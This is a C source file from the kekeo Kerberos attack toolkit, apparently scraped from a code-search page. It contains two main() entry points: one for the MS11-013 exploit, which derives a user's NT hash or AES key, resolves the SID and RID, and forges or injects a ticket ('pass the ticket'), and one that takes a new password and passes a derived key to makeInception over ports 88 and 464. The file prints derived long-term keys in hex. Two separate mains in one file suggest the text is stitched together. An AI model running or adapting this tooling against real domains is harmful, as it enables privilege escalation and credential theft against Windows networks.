Arquivo: ms11013.c Projeto: OJ/kekeo
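/*
 * kekeo ms11013 entry point.
 *
 * Command-line flags (all read through kull_m_string_args_byName):
 *   /target /service /user /domain  - mandatory; identify the principal whose
 *                                     key is derived and the SPN to ask for
 *   /key | /password               - one of them; the key is derived from the
 *                                     password, or taken as-is, by
 *                                     kull_m_kerberos_asn1_helper_util_stringToKey
 *   /aes256 | /aes128              - encryption type of the derived key;
 *                                     default is RC4-HMAC (NT hash)
 *   /kdc                           - KDC to talk to; when absent it is resolved
 *                                     with DsGetDcName(domain)
 *   /sid + /rid                    - domain SID and user RID; when absent (or
 *                                     invalid) they are fetched by
 *                                     impersonateToGetData, which needs /password
 *   /ptt | /ticket                 - inject the result directly, or write it to
 *                                     the named file (default TICKET_FILENAME)
 *
 * The actual ticket work is done by makeInception(); its internals are not
 * visible here. Port 88 is the Kerberos port.
 *
 * Security note: the derived long-term key (NT hash or AES key) is printed in
 * hex on the console, so the output of this tool is itself credential
 * material and must be handled as such. The key buffer is released with
 * LocalFree() without being wiped; NOTE(review): a SecureZeroMemory() before
 * the LocalFree() would be the usual hardening if that matters for the
 * caller's environment.
 *
 * Returns 0 in every case; failures are reported with PRINT_ERROR only.
 */
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szTarget, szService, szPassword = NULL, szKey = NULL, szSid, szRid, szKdc = NULL, szFilename = NULL;
	PSID sid = NULL, domainSid = NULL;
	DWORD ret, rid = 0;
	PDOMAIN_CONTROLLER_INFO cInfo = NULL;

	kprintf("\n"
		"  .#####.   " MIMIKATZ_FULL "\n"
		" .## ^ ##.  \n"
		" ## / \\ ##  /* * *\n"
		" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
		" '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)\n"
		"  '#####'    ...   with thanks to Tom Maddock & Sylvain Monne * * */\n\n");
	
	if(init())
	{
		/* /ptt wins over /ticket: a NULL filename means "pass the ticket" below. */
		if(!kull_m_string_args_byName(argc, argv, "ptt", NULL, NULL))
			kull_m_string_args_byName(argc, argv, "ticket", &szFilename, TICKET_FILENAME);

		if(kull_m_string_args_byName(argc, argv, "target", &szTarget, NULL))
		{
			if(kull_m_string_args_byName(argc, argv, "service", &szService, NULL))
			{
				if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
				{
					if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
					{
						/* Short-circuit: when /key is given, /password is not even looked up. */
						if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
						{
							if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
							else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
								userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
							else
								userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

							if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
							{
								if(!kull_m_string_args_byName(argc, argv, "kdc", &szKdc, NULL))
								{
									/* Auto-locate a DC by DNS name; "+ 2" skips the leading "\\\\" of the returned name. */
									ret = DsGetDcName(NULL, szDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo);
									if(ret == ERROR_SUCCESS)
									{
										szKdc = cInfo->DomainControllerName + 2;
										kprintf("[KDC] \'%s\' will be the main server\n", szKdc);
									}
									else PRINT_ERROR("[KDC] DsGetDcName: %u\n", ret);
								}

								if(szKdc)
								{
									if(kull_m_string_args_byName(argc, argv, "sid", &szSid, NULL) && kull_m_string_args_byName(argc, argv, "rid", &szRid, NULL))
									{
										if(ConvertStringSidToSid(szSid, &sid))
										{
											/* Parse the RID strictly: trailing garbage or a zero RID is an
											 * operator error, not a silent reason to fall back to impersonation.
											 * The SID is released here so the fallback starts from a clean state. */
											char *end = NULL;
											rid = strtoul(szRid, &end, 0);
											if(end == szRid || *end || !rid)
											{
												PRINT_ERROR("Invalid RID \'%s\' (argument ignored, trying auto)\n", szRid);
												rid = 0;
												LocalFree(sid);
												sid = NULL;
											}
										}
										else PRINT_ERROR_AUTO("ConvertStringSidToSid");
									}

									if(!(sid && rid))
									{
										/* Fallback: authenticate with the clear-text password to discover SID/RID.
										 * _pgmptr is the CRT's path of this executable; presumably the helper
										 * re-launches it under the impersonated context - confirm in its definition. */
										if(szPassword)
										{
#pragma warning(push)
#pragma warning(disable:4996)
											impersonateToGetData(szUser, szDomain, szPassword, szKdc,&sid, &rid, _pgmptr);
#pragma warning(pop)
										}
										else PRINT_ERROR("Impersonate is only supported with a password (you need KDC, SID & RID)\n");
									}

									if(sid && rid)
									{
										/* The password itself is never echoed; the derived key is (in hex). */
										kprintf("\n"
											"user     : %s\n"
											"domain   : %s\n"
											"password : %s\n"
											"sid      : "
											, szUser, szDomain, szKey ? "<NULL>" : "***");
										kull_m_string_displaySID(sid);
										kprintf("\n"
											"target   : %s\n"
											"service  : %s\n"
											"rid      : %u\n"
											"key      : "
											, szTarget, szService, rid);
										kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
										kprintf(" (%s)\n"
											"ticket   : %s\n"
											, kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype), szFilename ? szFilename : "** Pass The Ticket **");

										/* szKdc is known non-NULL here (outer check); no second test needed. */
										kprintf("kdc      : %s\n\n", szKdc);
										makeInception(szUser, szDomain, sid, rid, szTarget, szService, &userKey, szKdc, 88, szFilename);
									}
									else PRINT_ERROR("Missing valid SID & RID (argument or auto)\n");

									/* Release the SID whichever path produced it (argument or impersonation). */
									if(sid)
									{
										LocalFree(sid);
										sid = NULL;
									}
								}
								else PRINT_ERROR("Missing one valid DC (argument or auto)\n");

								if(cInfo)
									NetApiBufferFree(cInfo);

								LocalFree(userKey.keyvalue.value);
							}
						}
						else PRINT_ERROR("Missing password/key argument\n");
					}
					else PRINT_ERROR("Missing domain argument\n");
				}
				else PRINT_ERROR("Missing user argument\n");
			}
			else PRINT_ERROR("Missing service argument\n");
		}
		else PRINT_ERROR("Missing target argument\n");
	}
	else PRINT_ERROR("init() failed\n");
	term();
	return 0;
}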
/*
 * kekeo entry point (the "Aorato / Microsoft" variant): derives the user's
 * long-term key from /password or /key, locates a KDC for /domain, and hands
 * everything to makeInception() together with the /new value and the ports
 * 88 (Kerberos) and 464 (the port makeInception is given as second port;
 * presumably kpasswd - confirm in makeInception).
 *
 * Flags: /user /domain (mandatory), /key | /password (one of them),
 * /aes256 | /aes128 (default RC4-HMAC), /new (mandatory).
 *
 * Failures are reported with PRINT_ERROR; a failing stringToKey or getDC is
 * silent here (the helpers may report on their own). term() always runs and
 * the process exit code is always 0.
 *
 * Security note: the derived key is printed in hex, so the console output is
 * credential material.
 */
int main(int argc, char * argv[])
{
	EncryptionKey userKey;
	LPCSTR szUser, szDomain, szPassword = NULL, szKey = NULL, szNew;
	LPSTR szWhatDC;
	const char *shownPassword;
	
	kprintf("\n"
		"  .#####.   " MIMIKATZ_FULL "\n"
		" .## ^ ##.  " MIMIKATZ_SECOND "\n"
		" ## / \\ ##  /* * *\n"
		" ## \\ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
		" '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)\n"
		"  '#####'     ...   with thanks to Aorato / Microsoft   ...   * * */\n\n");

	if(!init())
	{
		PRINT_ERROR("init() failed\n");
		goto done;
	}

	/* Argument checks, in the same order as the errors are reported. */
	if(!kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
	{
		PRINT_ERROR("Missing user argument\n");
		goto done;
	}
	if(!kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
	{
		PRINT_ERROR("Missing domain argument\n");
		goto done;
	}
	/* Short-circuit: with /key present, /password is not looked up at all. */
	if(!(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL)))
	{
		PRINT_ERROR("Missing password/key argument\n");
		goto done;
	}

	/* Encryption type of the key to derive; RC4-HMAC (NT hash) unless told otherwise. */
	if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
		userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
	else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
		userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
	else
		userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;

	if(!kull_m_string_args_byName(argc, argv, "new", &szNew, NULL))
	{
		PRINT_ERROR("Missing new password\n");
		goto done;
	}

	/* Key derivation failure is not reported here. */
	if(!NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
		goto done;

	/* DC lookup failure is not reported here either; the key still gets released. */
	if(!kull_m_kerberos_helper_net_getDC(szDomain, DS_KDC_REQUIRED, &szWhatDC))
		goto free_key;

	/* The password is never echoed, only whether one was supplied. */
	shownPassword = szKey ? "<NULL>" : "***";
	kprintf("[KDC] \'%s\' will be the main server\n\n"
		"user     : %s\n"
		"domain   : %s\n"
		"password : %s\n"
		"key      : "
		, szWhatDC, szUser, szDomain, shownPassword);
	kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
	kprintf(" (%s)\n", kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype));

	makeInception(szUser, szDomain, szNew, &userKey, szWhatDC, 88, 464);
	LocalFree(szWhatDC);

free_key:
	LocalFree(userKey.keyvalue.value);
done:
	term();
	return 0;
}